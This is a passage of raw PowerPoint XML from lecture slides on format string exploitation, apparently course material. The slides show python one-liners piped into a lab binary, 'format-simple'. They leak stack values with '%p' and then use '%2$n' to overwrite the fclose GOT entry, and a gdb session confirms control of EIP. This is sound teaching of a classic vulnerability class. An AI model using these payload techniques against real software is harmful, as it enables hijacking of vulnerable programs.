              <a:t>fclose@plt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>&gt;: </a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="2000" dirty="0" smtClean="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="de-DE" sz="2000" dirty="0" smtClean="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>804839c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>:       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>jmp</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x80497d8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>80483a2</a:t>
            </a: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push   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>$0x18 </a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="2000" dirty="0" smtClean="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>80483a7</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>:       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>jmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>    804835c </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>&lt;_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>init+0x30&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="de-DE" sz="2000" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>080497d8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  00000407 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>R_386_JUMP_SLOT   00000000   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>fclose</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US"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265</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2284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String Exploitation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So, by writing into </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>080497e8 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>we control what happens after calling </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>fclose</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:ea typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>$ echo `python -c 'print "AAAABBBBCCCCDDDD" + "%p" * 8'` | ./format-simple; tail -1 /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>/log</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>AAAABBBBCCCCDDDD0x1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x414141410x424242420x434343430x44444444</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x702570250x702570250x70257025</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>echo `python -c 'print "AAAABBBBCCCCDDDD" + "%2\$p"'` | ./format-simple; tail -1 </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tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>/log </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>AAAABBBBCCCCDDDD0x41414141</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>echo `python -c 'print "\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>xd8\x97\x04\x08BBBBCCCCDDDD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>" + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>"%2\$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>x"'` | ./format-simple; tail -1 /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>/log</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>��</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>BBBBCCCCDDDD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="is-IS" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>80497d8</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>$ echo `python -c 'print "\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>xd8\x97\x04\x08BBBBCCCCDDDD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>" + "%2\$n"'` | ./format-simple; tail -1 /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>/log</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>��BBBBCCCCDDDD</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{FCFB7E3C-6220-8942-988C-3F6E25750AD7}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>266</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="62818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String Exploitation</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>$ echo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>`python -c 'print "\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>xd8\x97\x04\x08BBBBCCCCDDDD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>" + "%2\$n"'` &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>test</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>$ </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en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>format-simple</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lv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r </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>&lt; test</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>Program received signal SIGSEGV, Segmentation fault</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x00000010 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>in ?? </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>gdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>info</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>registers</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0" smtClean="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>eip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>            0x10</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>...</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"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267</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="39107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Exploitation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>How to control the value to write?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>To the man page!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The field </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>width"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>("%200x", 0) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>will pad the 0 with 200 space characters</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>This allows us to control the number of characters that are output!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>What is the number that we want to write?</a:t>
